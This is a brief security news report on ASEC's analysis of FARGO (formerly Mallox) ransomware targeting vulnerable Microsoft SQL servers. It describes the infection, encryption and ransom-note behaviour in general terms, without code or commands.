FARGO ransomware targets vulnerable SQL Servers
According to the latest report from ASEC (AhnlLab Security Emergency Response Center), new ransomware is in distribution that targets vulnerable Microsoft SQL servers.
FARGO ransomware variant is not completely new as it was already used in the past and was named Mallox since it was using the .mallox file extension.
Considering that Microsoft SQL servers are used for relational database management and therefore are storing and retrieving data for many software applications and internet services, issues with SQL can present a huge problem for corporations.
SQL servers can get infected when the MS-SQL process downloads a .NET file using a command prompt or PowerShell. Afterward, the infected file additionally downloads and loads malware that usually stops specific processes and services.
“The ransomware’s behavior begins by being injected into AppLaunch.exe, a normal Windows program. It attempts to delete a registry key on a certain path, and executes the recovery deactivation command, and closes certain processes.”, ASEC explained.
The ASEC researchers also said that FARGO encrypts files but not all of them, leaving the system partly accessible.
Cybercriminals rename encrypted files using the .Fargo3 extension with the ransom note generated in the folder with the name “RECOVERY FILES.txt”. In the recovery message, a victim can see threats of their files being permanently deleted or published in the public domain if they refuse to pay the ransom or try to use third-party software to decrypt files.